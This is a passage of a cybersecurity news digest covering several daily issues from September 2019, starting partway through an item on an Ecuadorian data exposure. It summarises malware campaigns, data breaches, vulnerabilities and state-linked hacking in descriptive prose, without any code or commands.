  • Information in the database appears to have been collated from a number of sources, which include Ecuadorian government registries, automotive association Aeade, and defunct Ecuadorian national bank Biess. Each individual in the database can be identified by a ten-digit ID code which most likely corresponds to the Ecuadorian ‘cédula de identidad’, which is similar to a US social security number.
  • Entering the ten-digit code displays related personal information such as full name, gender, date of birth, contact details, address, date of death, level of education, and more. Data relating to an individual’s family members, employment information, and, if applicable, Biess-related banking details could also be found.
  • The data also contained information about Ecuadorian companies such as their contact information, taxpayer identification number, and legal representatives. The exposure has now been closed, but it could lead to long-term consequences for listed individuals.

Source

 

Hacker leaks information of 24.3 million Lumin PDF users

  • On September 16th, 2019, a hacker released Lumin PDF’s entire user database which contained the details of 24,386,039 customers. Lumin PDF is a cloud-based service used for accessing PDF files. The product is made by Nitrolabs and is one of the third-party PDF apps that can be used on Google Drive. 
  • The hacker claims to have gained the information from an exposed MongoDB database in April 2019. The hacker also stated that the original database was taken down following a ransomware attack. 
  • Data contained in the files includes full names, email addresses, gender, locale settings, and a hashed password string or Google access token. The majority of users have a Google access token linked to their account which could allow attackers to gain access to their Google Drive. The CEO of Nitrolabs acknowledged the breach but denied that the data contained valid Google access tokens. Both Lumin and Google are currently investigating the issue.

Source

 

Robstown Police Department hit by cyberattack

  • Robstown Police Department’s servers were compromised by some unnamed malware, resulting in the loss of data, including evidence and reports related to pending investigations from 2018 and 2019.

Source

 

Vulnerabilities

LastPass bug can reveal passwords

  • Security researcher Tavis Ormandy identified a flaw in LastPass which allowed him to retrieve a user’s most recent LastPass login information. An attacker could exploit the vulnerability by luring their victim onto a malicious page and tricking the browser extension into providing a previously used password. The flaw is caused by a failure to update a cache correctly.
  • LastPass patched the vulnerability but also stated that the bug would have only worked in a ‘limited set of circumstances on specific browser extensions’.

Source 1 Source 2

 

Certain AMD Radeon cards contain remote code execution vulnerability

  • AMD Radeon cards in the Radeon RX550 and 550 Series, when running under VMware Workstation 15, contain a vulnerability in their ATIDXX64[.]DLL driver. The flaw, tracked as CVE-2019-5049, can be triggered by an attacker who provides a specially crafted shader file, causing an out-of-bounds memory write. The attack can be launched from within a VMware guest and can potentially cause code execution on the associated VMware host.

Source

 

Atlassian’s Jira software contains multiple vulnerabilities

  • Researchers at Cisco Talos discovered multiple vulnerabilities in a range of Atlassian’s Jira software products. The bugs could be exploited to execute code inside of Jira, disclose information, and more. A full list of impacted products and their associated vulnerabilities is available via Cisco Talos.

Source

 

XSS flaw found in Simple Fields plugin

  • A cross-site scripting (XSS) vulnerability was found in the WordPress Simple Fields plugin, which could allow an attacker to inject malicious JavaScript code. Further insecure code was also found in the plugin, as well as additional vulnerabilities.

Source

 

Security vulnerability in Uber allows for account take-over

  • Security researcher Anand Prakash discovered a vulnerability in Uber that could allow an attacker to track a user’s location and take rides from their accounts. The vulnerability also affects Uber driver and Uber Eats accounts.
  • The vulnerability can be exploited via an API request to obtain a user’s universally unique identifier (UUID). With the UUID, Prakash managed to gain access to private information, including the access token, location and address. Using the mobile app’s access token, the researcher was able to fully compromise a test account.
  • The vulnerability has since been fixed.

Source

 

Numerous vulnerabilities found in SOHO routers and NAS devices from multiple vendors

  • The SOHOpelessly Broken 2.0 project, which analysed small office/home office (SOHO) router and network-attached storage (NAS) devices, found a total of 125 vulnerabilities across a range of networking hardware. Tested products included devices from Buffalo Americas, Synology, TerraMaster Technology, Zyxel, Drobo Inc, ASUS, Asustor Inc, Seagate Technology, QNAP Systems, Lenovo, Netgear, Xiaomi, and Zioncom.
  • At least one of the flaws in each product could allow remote shell access or access to the admin interface, as the products are vulnerable to cross-site scripting, OS command injection or SQL injection.
  • Six of the products contained vulnerabilities that could allow a threat actor to remotely gain complete control of a device without the need for authentication. The affected products are Asustor AS-602T, Buffalo TeraStation TS5600D1206, TerraMaster F2-420, Drobo 5N2, Netgear Nighthawk R9000, and TOTOLINK A3002RU.
  • The full list of vulnerabilities is available in the project’s whitepaper.

Source

 

Several critical vulnerabilities found in CODESYS products

  • Vulnerabilities were found in CODESYS Control, Gateway V3 and V3 Development System, as well as the CODESYS ENI server. The flaws could be exploited for remote execution of arbitrary code, denial-of-service attacks, and more.
  • All vulnerabilities bar one have been fixed. The remaining one is due to be fixed with an update in February 2020.

Source

 

General News

China’s Ministry of State Security allegedly behind cyberattack on Australian parliament

  • Sources claiming to have direct knowledge of the investigation concerning the February 2019 cyberattack on the Australian parliament informed Reuters that the Australian Signals Directorate concluded China was responsible for the attack. Prime Minister Scott Morrison previously stated the attack had likely been carried out by a foreign government.
  • According to one of the sources, the report included the Department of Foreign Affairs recommending this finding be kept secret, so as to avoid disruption to trade relations with China.
  • The Australian government has not released any details of the report or indications on who is believed to be behind the attack, whilst China’s Foreign Ministry denied any involvement.

Source

 


Silobreaker Daily Cyber Digest – 16 September 2019

 

Malware

Threat actor observed selling malware containing SpyNote code

  • Researchers at SenseCy observed an Arabic-speaking threat actor, dubbed mobeebom, advertising version 4 of MobiHok RAT on an English hacking forum in July 2019. The threat actor has advertised MobiHok since January 2019, promoting it on Facebook, YouTube, Arabic hacking forums, as well as on mobeebom’s own website.
  • MobiHok is said to have multiple capabilities, including keylogging, bypassing security mechanisms, and taking control of files, cameras, SMS, contacts, apps, settings and more.
  • According to SenseCy’s analysis of the malware sample, mobeebom based MobiHok’s source code on SpyNote and added only minor changes, yet aims to sell it as new and ‘make it the top Android RAT on the market.’

Source

 

Ongoing Campaigns

Update to Nemty Ransomware adds processes and service killer feature

  • Security researcher Vitali Kremez discovered code changes to Nemty Ransomware which allow the malware to kill processes and services while a user is running them.
  • The updated code targets WordPad, Microsoft Word, Outlook, SQL, VirtualBox and more. Bleeping Computer suggested that the inclusion of SQL and VirtualBox indicates that the malware will be used to target corporate victims.
  • The authors also updated a blacklist which prevents the malware from encrypting files on devices in Azerbaijan, Armenia, Kyrgyzstan, and Moldova. The various updates to Nemty’s code may have been triggered by the lukewarm response that the ransomware has generated in the cybercriminal underground.

Source (Includes IOCs)

 

InnfiRAT targets cryptocurrency wallets

  • Researchers at Zscaler identified a new remote access trojan written in .NET which they dubbed InnfiRAT. The malware can steal passwords, usernames, session data, and take screenshots on a victim’s device. InnfiRAT is also configured to detect and steal cryptocurrency wallet information for products such as Bitcoin and Litecoin.
  • Stolen information is exfiltrated to the attackers’ C2, and attackers can also instruct InnfiRAT to download additional malware onto compromised devices.

Source (Includes IOCs)

 

Spam campaign delivering Ordinypt malware targets German users

  • Bleeping Computer identified a new campaign targeting German users with Ordinypt malware. The campaign appears to have begun on September 11th, 2019, and is delivered via an email purporting to be from ‘Eva Richter’ which contains an executable disguised as a PDF resume.
  • Users who open the malicious attachment will infect their system with Ordinypt. The malware pretends to be ransomware and appears to encrypt the target’s files. In actuality, Ordinypt wipes files, deletes shadow volume copies and disables the Windows 10 recovery environment.
  • The attackers leave a note demanding a Bitcoin payment in exchange for a decryptor. Victims should not pay the ransom, as their files cannot be recovered via this method.

Source (Includes IOCs)

 

Gorgon Group spotted using new malware sample

  • Security researcher StrangerealIntel identified that the Gorgon Group is using new malware while retaining the same TTPs and accounts. The attack begins via a VBA macro contained in a malicious document, which then connects to Pastebin and runs scripts that obfuscate the attack to load an older Delphi version of the AZORult stealer.
  • A full analysis of the attack is available via StrangerealIntel’s report.

Source (Includes IOCs)

 

Clients targeted by phishing attacks following attack on Coinhouse

  • The French cryptocurrency exchange Coinhouse was targeted in a phishing attack on September 12th, 2019, after which hackers gained access to its client database containing names and email addresses. Using the client data, the hackers then sent phishing attacks against Coinhouse clients.
  • In response to the attack, Coinhouse switched the platform to maintenance mode to prevent hackers from gaining access to user funds. Coinhouse has advised its customers not to click on any emails relating to the company.

Source

 

NoxPlayer observed delivering malware

  • Users of NoxPlayer are reporting that the popular gaming emulator is delivering Segurazo, yet the malware is only detected as a Potentially Unwanted Program (PUP) by anti-virus solutions.
  • PUP files are often added to emulators, but are generally non-threatening, meaning many users may not be aware of the malware’s presence. Segurazo also appears to use tactics to evade anti-virus countermeasures, making it more difficult to remove from a user’s system.

Source

 

Hacker Groups

US Treasury sanctions state-sponsored North Korean hacker groups

  • On September 13th, 2019, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced sanctions against the Lazarus Group, Bluenoroff and Andariel. The US asserts that Lazarus Group was created as early as 2007 by the cyber operations wing of North Korea’s Reconnaissance General Bureau (RGB). Bluenoroff and Andariel are designated as sub-groups of Lazarus.
  • Lazarus Group has previously targeted a multitude of organisations including those involved in defence, finance, critical infrastructure, the media, and manufacturing. The group was also involved in distributing WannaCry Ransomware.
  • Since 2014, Bluenoroff has been conducting cyberheists against foreign institutions. The US states that stolen funds are used in part to fund the regime’s weapons development programmes.
  • Andariel was first identified in 2015 and consistently conducts operations against South Korea’s government, infrastructure and military. The purpose of these attacks is to generate capital, exfiltrate information, and cause disruption.

Source

 

Leaks and Breaches

Bold[.]com exposes data through unprotected Elasticsearch cluster

  • On August 10th, 2019, researchers at Security Discovery identified an unprotected Elasticsearch cluster which belonged to the infrastructure team at Bold[.]com. Exposed information included tickets which contained sensitive information relating to internal infrastructure. The exposed cluster also contained database and administrator logins.
  • Administrators were notified on August 10th, 2019, and the database was restricted on the same day.

Source

 

Hungarian Development Centre suffers data breach

  • According to Hungarian media site 24[.]hu, a data breach on the Hungarian Development Centre (MFK) in mid-July 2019 destroyed its entire database containing official documentation, contracts, invoices, corporate software, and more. 24[.]hu claims the attack most likely came from North Korea.
  • The Ministry of Foreign Affairs and the Foreign Ministry of Hungary confirmed the data breach, however, stated that MFK immediately shut down its system upon discovering the attack and that no data was lost as a result.

Source

 

Vulnerabilities

XSS vulnerability found in FileBird Lite plugin

  • Plugin Vulnerabilities noticed a threat actor probing the WordPress FileBird Lite plugin and discovered it contains a cross-site scripting (XSS) vulnerability, as well as further insecure code, some of which lacks a nonce check to prevent cross-site request forgery (CSRF). Both the XSS vulnerability and the CSRF could allow anyone logged into WordPress to inject malicious JavaScript code.

Source

 

 


Silobreaker Daily Cyber Digest – 13 September 2019

Malware

Newly discovered WiryJMPer dropper used to deliver Netwire Rat

  • Researchers at Avast discovered a new dropper, dubbed WiryJMPer, disguised as an ABBC Coin wallet. The malware attempts to hide its installation from the user by displaying program windows in the foreground. Once opened, the dropper delivers the remote access trojan NetWire RAT.
  • NetWire RAT can be used to control the target computer, record keystrokes, steal passwords, and more.

Source 1 Source 2 (Includes IOCs)

 

New Glupteba trojan variants found written in Golang

  • Researchers at Cybereason discovered new variants of Glupteba written in Golang. The use of Golang allows threat actors to make the malware executable across several operating systems despite compiling it only once, on a single system, from one repository.
  • The researchers also observed the malware implementing a cryptocurrency miner and using living-off-the-land techniques to gain access and persistence. Yet they note the malware failed to evade detection, whilst also using contradictory techniques.
  • A full analysis of the infection method is available on Cybereason’s blog.

Source (Includes IOCs)

 

Ongoing Campaigns

Newly identified ‘Simjacker’ attack can deliver malware through SMS

  • Researchers at AdaptiveMobile Security identified a new vulnerability and exploit that has been employed to carry out surveillance on individuals in a multitude of countries. The attack, dubbed Simjacker, has been conducted for at least two years by an unnamed private company that works with governments.
  • The attack involves sending an SMS with SIM Toolkit (STK) instructions to a target mobile. The SMS can be sent from a handset, a GSM modem or an A2P account connected to an SMS sending account. The attack targets the S@T Browser within the UICC/eUICC (SIM Card) and uses the S@T Browser library as its execution environment to trigger logic on the handset.
  • The attack then requests location and specific device information from the mobile. Stolen information is then sent to the attacker via SMS. Victims of the attack are unaware of either incoming or outgoing texts.
  • The researchers tested the attack and found that they could use it to obtain location information, launch browsers, open channels, set up phone calls, and more. Additionally, the attack works on devices from ‘nearly every manufacturer’ including Apple, ZTE, Samsung, Google, IoT devices with SIM cards, and more.

Source

 

Irish mailboxes targeted with sextortion scam

  • Researchers at ESET identified several related sextortion emails being delivered to Irish mailboxes. The scammers claim to have access to the victim’s computer and accuse the target of accessing child pornography. The scammers then demand £5000 in Bitcoin.

Source

 

Leaks and Breaches

Garmin South Africa customer details stolen following portal breach

  • On September 12th, 2019, Garmin Ltd announced that customers who bought products through Garmin South Africa’s payment portal have had their personal data compromised. Stolen personal information included phone numbers, email addresses, and first and last names. Exposed payment information included card numbers, expiration dates and CVV codes.
  • Garmin did not disclose the exact details of the attack. However, security researcher Jérôme Segura suggested that the type of data exfiltrated and the fact that the portal ran on Magento CMS indicated that the attackers may have used a Magecart skimmer.

Source 1 Source 2

 

Major fraud network uncovered after discovery of unsecured database

  • vpnMentor researchers uncovered a major criminal operation after discovering an unsecured database containing a cache of 17 million emails and 1.2 terabytes of data. According to vpnMentor, the owners of the database are the same fraud group that Groupon has been monitoring since 2016. However, Groupon stated that although similarities were found, no evidence that they are related or connected was found.
  • The initial investigation suggested the database was exposing personal details of individuals purchasing tickets on Neuroticket, Ticketmaster and Tickpick, yet further research showed that 90% of the records on the database linked to Groupon.
  • The database was found not to be linked to any of the affected vendors and to contain fraudulent accounts that were used for purchasing tickets that would later be resold at full or higher prices. The researchers also discovered a ransom note demanding $400 in Bitcoin, suggesting at least one criminal had hacked the database and was attempting to extort the owners.

Source 1 Source 2

 

Vulnerabilities

WordPress contains XSS zero-day vulnerability

  • Researchers at Fortinet identified a vulnerability in WordPress versions 5.0 to 5.2.2. The XSS issue is caused by WordPress’s built-in editor Gutenberg’s failure to filter JavaScript/HTML code in the Shortcode error message.
  • The issue can be exploited by a remote attacker with contributor privileges or higher and can be used to execute arbitrary JavaScript/HTML code in the browser of victims who access the compromised page.
  • If a visitor to the page has administrator rights the attacker could exploit the vulnerability to add themselves as an administrator through WordPress’s GetShell function. An attacker who gained administrator rights could then take control of the webserver.

Source (Includes IOCs)

 

Trend Micro publishes technical brief on critical Internet Explorer vulnerability

  • Trend Micro published an analysis of a use-after-free vulnerability, tracked as CVE-2019-1208, which could allow threat actors to gain the same privileges as the user of the impacted system. If a user has administrative access, threat actors could hijack their system to install or uninstall programmes, view and modify data, create user accounts with full privileges, and more.
  • The flaw could be triggered using VBScript Class through multiple steps. In response to the discovery, VBScript was disabled for Internet Explorer 11 in Windows 7, 8, and 8.1, however according to Microsoft, VBScript could be enabled via Registry or Group Policy.
  • The vulnerability was patched in Microsoft’s September Patch Tuesday.

Source

 

Facebook patch Instagram flaw that allowed phone number to be linked to user details

  • Researcher ZHacker13 identified a vulnerability in Instagram that used a combination of brute force and the platform’s contact import feature to access account details and phone numbers.
  • The first stage of the attack employs an algorithm to brute force Instagram’s login form. The algorithm checks phone numbers to determine if they are linked to a live account. When an attacker identifies a live phone number, they can abuse Instagram’s Sync Contacts feature to link the number to an account. Exposed data included users’ real names, Instagram account numbers and handles, and full phone numbers.
  • The researcher reported the vulnerability in early August. Facebook has now patched the issue and the attack no longer works.

Source

 

General News

Former US officials claim Israel planted spying equipment near White House

  • According to Politico, three former US officials claimed that the international mobile subscriber identity-catchers (IMSI-catchers), also known as StingRays, that were discovered in 2017 were placed there by Israel. IMSI-catchers are a type of surveillance device that imitate cell towers and are used to capture calls and data use.
  • Israeli Embassy spokesperson Elad Strohmayer has denied the allegations, calling them ‘absolute nonsense,’ whilst Prime Minister Benjamin Netanyahu referred to them as ‘a complete fabrication,’ stating that Israel has a directive not to undertake any intelligence work in the US.

Source

 


Silobreaker Daily Cyber Digest – 12 September 2019

 

Malware

New Trickbot malware dropper contains 10k lines of code

  • Researchers at Cybaze-Yoroi ZLab analysed a new dropper employed by TrickBot operators composed of several thousand highly obfuscated lines of code. The dropper abuses the old Windows File System feature Alternate Data Stream.
  • The JavaScript dropper contains nearly 10,000 lines of obfuscated code that uses randomisation techniques to rename variables and comments. It also includes chunks of junk instructions, most likely to ensure a low detection rate, which, the researchers warn, makes it an increased threat to companies and users.
  • A full analysis of the code is available on Cybaze-Yoroi ZLab’s blog.

Source (Includes IOCs)

 

Ongoing Campaigns

New Kimsuky campaign targets US-based entities using trojanised documents

  • Prevailion researchers observed a new campaign, dubbed Autumn Aperture, in which official documents written by industry experts were trojanised and sent to US-based entities in the summer of 2019. The researchers have linked the campaign to Kimsuky, a North Korean hacker group also known as Velvet Chollima or Smoke Screen.
  • Using socially engineered emails, the documents are sent as Word files, with the trojan embedded in a Kodak FlashPix (FPX) file, a format less likely to be detected as malicious by anti-virus solutions. In some cases, the threat actors also sent Bitly links, which would redirect a user to a webpage that downloads a RAR file containing a trojanised document.
  • The documents concern nuclear deterrence, North Korea’s nuclear submarine programme, and North Korean economic sanctions, with some having been used in previous Kimsuky campaigns. This campaign saw new functionalities added by the group, including the use of FPX files, enumeration of the host machine, experimentation with password protection for the documents, and additional anti-virus solutions checked for by the dropper.

Source (Includes IOCs)

 

New malware that steals classified files has links to Ryuk

  • Security researchers at MalwareHunterTeam identified a malware that is used to detect and exfiltrate files relating to finance, the military and law enforcement. The malware shares certain code similarities with Ryuk malware but is designed to steal files rather than encrypt them.
  • Security researcher Vitali Kremez analysed the virus. Upon execution the malware runs a recursive scan and checks for Word and Excel files. Detected files are then checked against a list of 77 strings for phrases such as ‘hack’, ‘tank’, ‘secret’, ‘federal’ and ‘military’. Files that match a string are then uploaded to an FTP site that is controlled by the attacker.
  • The malware also contains a blacklist in order to avoid folders and files which contain terms such as ‘Windows’, ‘Intel’, ‘Mozilla’ and ‘Ryuk’. It is unknown whether the author behind the malware has links to Ryuk or has altered its code. Bleeping Computer, MalwareHunterTeam, and Vitali Kremez suggested that the virus is intended to be run prior to an encryption attack.

Source (Includes IOCs)

 

Virtual disk files can be abused to deliver malware

  • Security researcher Will Dormann discovered that attackers can bypass initial AV defences in Windows by placing their malware inside downloaded VHD and VHDX disk images. Windows does not scan the container or mark it as potentially dangerous.
  • Researchers tested the attack vector and discovered that products which would normally detect malicious files overlook them when stored in a VHD file. Security researcher Jan Poulsen constructed a script that mounted the VHD automatically and then executed the malware. The researcher attached the VHD to a Gmail message and downloaded the file with Google Chrome onto a device running Windows Defender. The malicious file was not detected at any point in this process.
  • Poulsen also managed to get the malware to execute on a target system by automating the mounting process using the Windows ‘diskpart’ command-line disk partitioning tool. Upon execution the malware was finally detected and stopped by antivirus products.

Source 1 Source 2

 

New campaign delivers Astaroth trojan using Facebook and YouTube profiles

  • Researchers at Cofense Intelligence observed a campaign delivering Astaroth trojan that is exclusively targeting Brazilian citizens, similar to another campaign conducted in September 2018. According to the researchers, 8,000 machines were compromised within a week.
  • The malware is delivered via emails using an invoice theme, a show ticket theme, or a civil lawsuit theme, which encourage users to download and open an HTM file, thereby starting the infection chain.
  • Multiple stages of infection are involved, including the downloading of two DLL files, which are joined together and side-loaded into a legitimate programme that can bypass security measures. The technique of ‘process hollowing’ is then used to inject malicious code into programmes, after which Astaroth retrieves C2 configuration data and starts collecting sensitive data of the user, including financial information, stored passwords, email client credentials, SSH credentials, and more.
  • The researchers found that the C2 configuration data is hosted and maintained by using YouTube and Facebook profiles. The data is present within Facebook posts or profile information of YouTube user accounts, which enables the threat actors to bypass network security measures.

Source (Includes IOCs)

 

Watchbog cryptomining botnet exploits unpatched web application to access systems

  • Researchers at Cisco Talos identified an attack in which Watchbog malware infected a victim’s system via a vulnerability, tracked as CVE-2018-1000861. The flaw exists in the Stapler web framework, which handles HTTP requests, in Jenkins versions up to 2.138.1 and 2.145.
  • The Linux-based Watchbog malware is used to mine Monero cryptocurrency. The attackers behind this campaign did not try to hide their activity and relied on Pastebin for their C2. Additionally, the attackers left a note on infected systems claiming that they wanted ‘To keep the internet safe’ and stating that ‘We only Wanna Mine’.

Source (Includes IOCs)

 

Hacker Groups

Cobalt Dickens conducts global campaign targeting universities

  • Researchers at Secureworks discovered that the hacker group Cobalt Dickens are conducting a campaign targeting universities. The researchers suggested that the group are likely linked to the Iranian government. The recent campaign, which was discovered in July and August 2019, targeted over 60 universities in Australia, the US, the UK, Canada, Hong Kong, and Switzerland.
  • The TTPs employed by Cobalt Dickens in this recent attack have remained largely consistent with those observed in previous campaigns. The group use compromised university resources to deliver emails which contain links to fake login pages associated with universities. Entered credentials are recorded by the attacker before the target is redirected to a genuine login site.
  • The group were observed using publicly available tools such as the SingleFile plugin and HTTrack Website Copier. Cobalt Dickens also registered twenty new domains, many of which use valid SSL certificates that were predominantly signed by Let’s Encrypt. As of September 11th, 2019, the researchers have observed Cobalt Dickens targeting at least 380 universities in over 30 countries.

Source (Includes IOCs)

 

Leaks and Breaches

Entercom hit by ransomware attack

  • Entercom Communications Corp was hit by a ransomware attack over the weekend of September 7th, 2019, affecting its emails, phones, music scheduling, production, billing, and other internal digital systems.
  • According to Radio Insight, the company will not be paying the $500,000 ransom that was demanded.

Source 1 Source 2

 

Personal data of 8,253 Agora users accidentally exposed by Unicef

  • On August 26th, 2019, the United Nations Children’s Fund (Unicef) accidentally sent a spreadsheet containing the personal data of 8,253 users of its Agora learning portal to roughly 20,000 users. According to Unicef, it has disabled the functionality that allows reports to be sent and also blocked the Agora server from sending emails with attachments as a prevention measure.
  • Exposed data may have included names, email addresses, duty stations, gender, organisation, name of supervisor and contract type.

Source

 

Dealer Leads LLC exposes 198 million records

  • On August 19th, 2019, researchers at Security Discovery identified a publicly accessible Elasticsearch database belonging to Dealer Leads LLC. The dataset contained 413GB of data and 198 million records.
  • The database contained information on those looking to purchase automobiles. Data included loan and finance information, vehicle information, and the IP addresses of website visitors. Additional information included names, email addresses, phone numbers, and more. The database was secured after the researchers made contact with the company on August 20th, 2019.

Source

 

Vulnerabilities

Vulnerability found in Libra’s Move modules

  • The vulnerability was present in the Move IR compiler of the Libra Move modules and could allow for inline comments to be disguised as executable code. The flaw allows anyone with rights to publish Move modules to deceive users, with varying levels of potential impact.
  • The vulnerability was fixed in commit 7efb022.

Source

 

Travelpayouts plugin update contains incomplete vulnerability fixes

  • A new version of the WordPress Travelpayouts plugin, which was meant to be a security update, was found to contain an incomplete fix for a vulnerability, whilst another related issue was found to be left unfixed, leaving the plugin vulnerable to persistent cross-site scripting (XSS) attacks.

Source

 

Intel patches vulnerability in Easy Streaming Wizard

  • Intel patched a vulnerability, tracked as CVE-2019-11166, in Easy Streaming Wizard versions 2.1.0731 and earlier. The issue exists due to improper file permissions in the Easy Streaming Wizard installer. An authenticated local user can exploit the vulnerability to escalate their privileges.
  • A second vulnerability, tracked as CVE-2019-11184, impacts Intel Xeon E5, E7 and SP families that support Data Direct I/O Technology (DDIO) and Remote Direct Memory Access (RDMA). The vulnerability can be exploited by an attacker with adjacent access and can potentially be leveraged to disclose information.
  • Intel have not issued a patch for CVE-2019-11184 but have recommended that untrusted access to DDIO- and RDMA-enabled systems is limited.

Source

 

Bitcoin’s Lightning Network vulnerabilities discovered in the wild

  • On September 10th, 2019, Lightning Labs stated that vulnerabilities that were discovered in August 2019 are now being exploited in the wild. Exploitation of the issues, tracked as CVE-2019-12998, CVE-2019-12999, and CVE-2019-13000, could result in funds being lost from accounts. Lightning Labs urged Lightning Network users to update their systems in order to mitigate the issue.

Source

 

Chrome 77 fixes 52 security issues including one critical vulnerability

  • The critical vulnerability, tracked as CVE-2019-5870, was discovered by Guang Gong and is a use-after-free vulnerability in the media component. The patch also fixed 8 high severity issues, 17 medium severity issues, and 10 low severity issues. A full list of patched vulnerabilities is available via Google.

Source 1 Source 2

 

Critical vulnerability patched in SAP NetWeaver

  • SAP released their security notes for September 2019 and addressed one new critical vulnerability, tracked as CVE-2019-0355, in SAP NetWeaver AS for Java. The issue exists in ‘the SAP default implementation of the HTTP PUT method that allows attackers to bypass the input validation check.’ Successful attackers would gain the ability to upload dynamic web content and take control of the whole application.
  • Updates were also applied to patches that have previously been released for three other critical flaws. A full list of CVEs and impacted products is available via SAP.

Source 1 Source 2

 

Siemens warns customers that Windows RDS vulnerabilities impact some products

  • Siemens informed customers that some of its Healthineers products are impacted by a series of Windows RDS vulnerabilities known as DejaBlue. The company is working on patches for some products but also advised users to install Microsoft’s patches.
  • Siemens warned users that many products are also impacted by Linux kernel vulnerabilities related to the handling of SACK packets. The company released some patches but warned most users to use robust security practices and to limit network access to vulnerable devices.

Source

 

 


Silobreaker Daily Cyber Digest – 11 September 2019

Ongoing Campaigns

Exim vulnerability exploited to deliver Sustes malware

  • Positive Technologies researchers detected a wave of attacks in which the Exim mail server vulnerability CVE-2019-10149 is exploited to deliver the cryptominer Sustes.
  • The malware is delivered using two methods. The first involves a chain of scripts that installs the Monero miner on the host and adds it to crontab. One of the scripts adds a public SSH key to a user’s ‘authorized_keys’ file, which allows an attacker to obtain SSH access to the system without a password.
  • The second method involves a chain of Python scripts, one of which contains a scanner for random Redis servers. Similar to the first method, the malware adds itself to crontab for autorun and adds its own key to the list of trusted SSH keys.

Source (Includes IOCs)

 

Cylance researchers publish analysis of TrickBot malware

  • TrickBot malware was discovered in the wild in 2016 and continues to be updated and developed. The malware attempts to steal information and perform man-in-the-middle attacks on banking websites.
  • The malware is delivered through emails and illegitimate websites, with malicious emails primarily relating to banking topics. Targets are often asked to enable document editing, at which point a macro runs a PowerShell script to download the malware.
  • Upon execution the malware pulls files from its C2. Additional DLL files give the malware reconnaissance functions and allow it to steal a wide variety of information. The malware also contains worm modules which allow it to spread across local networks.
  • A full technical analysis is available via Cylance.

Source (Includes IOCs)

Leaks and Breaches

Premier Family Medical hit by ransomware attack

  • A ransomware attack on the Utah-based physician group Premier Family Medical took place on July 8th, 2019, and may have exposed private health information of 320,000 patients. All ten of its Utah County locations were impacted. It is unclear whether a ransom was paid.

Source 1 Source 2

 

Private data of 2 million Verizon Pay Monthly customers exposed

  • Security researcher Daley Bee was able to access 2 million Verizon Pay Monthly contracts after brute-forcing GET parameters for a Verizon-owned subdomain, allowing him to be treated as an authenticated user. The subdomain is used by employees to access internal Point of Sale tools and view customer information.
  • Exposed data includes full names, addresses, mobile numbers, model and serial number of purchased devices, and signatures.

Source

 

Community Psychiatric Clinic data breaches affect 15,537 patients

  • Mental health services provider Community Psychiatric Clinic suffered three separate email security breaches, affecting 3,030, 6,641, and 5,866 patients respectively. The breaches were reported to the Department of Health and Human Services’ Office for Civil Rights on August 15th, 2019.
  • It is unclear whether the three breaches include two data breaches previously reported on, which took place on March 12th and May 8th, 2019.

Source

 

Vulnerabilities

Vulnerabilities found in OpenEMR

  • Two vulnerabilities were discovered affecting the open-source medical records management tool OpenEMR version 5.0.1(6). Older versions are also believed to be affected. The flaws were patched with version 5.0.2.
  • CVE-2019-8371, an arbitrary remote code execution vulnerability, could allow attackers to modify files within the OpenEMR application web root.
  • CVE-2019-8368 is a cross-site scripting flaw that could enable attackers to execute arbitrary JavaScript and could affect administrative users, which could lead to a full server compromise.

Source (Includes IOCs)

 

XSS flaw found in Premium Addons for Elementor WordPress plugin

  • Plugin Vulnerabilities researchers discovered the authenticated persistent cross-site scripting (XSS) flaw after noticing a hacker probing usage of the WordPress plugin ‘Premium Addons for Elementor’. The researchers also found further insecure code, suggesting the plugin may contain additional vulnerabilities.

Source

 

Microsoft Patch Tuesday fixes two zero-days

  • On September 10th, 2019, Microsoft released their monthly security update, which patched 80 CVEs across 15 products and services. 17 issues are rated as critical and a further 62 are assessed as important.
  • Two zero-day issues, tracked as CVE-2019-1215 and CVE-2019-1214, are privilege elevation vulnerabilities. The former exists in the way Winsock handles objects in memory and the latter is related to the way Windows Common Log File System handles objects in memory.
  • Three vulnerabilities, CVE-2019-1235 in Windows Text Service Framework, CVE-2019-1253 in Windows AppX Deployment Server and CVE-2019-1294 in Windows Secure Boot, were also publicly disclosed.

Source

 

Adobe release patches for arbitrary code execution

  • On September 10th, 2019, Adobe released patches for three security vulnerabilities in Adobe Flash Player and Adobe Application Manager.
  • Adobe Flash Player contains two critical vulnerabilities tracked as CVE-2019-8070 and CVE-2019-8069. Both flaws could lead to arbitrary code execution.
  • CVE-2019-8076 is a flaw related to a DLL hijacking vulnerability which could enable arbitrary code execution within the Application Manager.

Source

 

Multiple vulnerabilities uncovered in D-Link and Comba Telecom network products

  • Trustwave researcher Simon Kenin discovered that the D-Link DSL-2875AL router is impacted by a vulnerability which was previously identified in other D-Link products. An attacker could exfiltrate both router settings and the password, which is stored in clear text, by sending a crafted request to the web management server. This attack can be performed without authentication.
  • DSL-2875AL and DSL-2877AL models also display HTML code on their login page which corresponds to the credentials required to authenticate with the Internet service provider.
  • Credential vulnerabilities were also identified in Comba Telecom’s AC2400 Wi-Fi Access Controller, AP2600-I Wi-Fi Access Point and AP2600 Wi-Fi Access Point.

Source 1 Source 2

 

Basic Laboratory Information System (BLIS) impacted by two critical vulnerabilities

  • CVE-2019-5617 impacts BLIS 3.5 and earlier. The flaw is due to issues in authentication and authorisation verification and can lead to unauthenticated password resets.
  • CVE-2019-5644 impacts BLIS 3.51 and earlier and can allow unauthenticated updates to user data, including admin privilege escalation.
  • A third vulnerability, tracked as CVE-2019-5643, is rated as high severity. The flaw impacts BLIS 3.51 and earlier, and can lead to unauthenticated enumeration of facilities and usernames.

Source

 

Intel chip vulnerability allows attackers to steal sensitive information

  • Researchers at VUSec discovered a vulnerability in Intel’s performance-enhancing Data-Direct I/O (DDIO) technology. DDIO is used in recent Intel server-grade processors and relieves bottleneck constraints by allowing peripherals to perform direct cache access on the CPU’s last-level cache.
  • The researchers developed an attack, dubbed NetCAT, which they claim is the ‘first network-based cache attack on the processor’s last-level cache of a remote machine’. When Remote Direct Memory Access (RDMA) and DDIO are enabled, an attacker can perform a side channel attack by sending specially crafted network packets to a DDIO-capable CPU.
  • The researchers showed that they could then perform a keystroke timing attack to identify what a target was typing in a private SSH session.
  • Intel classified the issue as low severity but did advise disabling DDIO and RDMA on affected CPUs or limiting direct access to vulnerable systems from untrusted networks.

Source 1 Source 2

 

Local privilege escalation vulnerability found in Microsoft Windows 10

  • Fortinet researchers discovered an additional vulnerability, tracked as CVE-2019-1287, capable of local privilege escalation in Windows Network Connectivity Assistant affecting Windows 10 Enterprise or Education versions. A patch was released with the latest update.
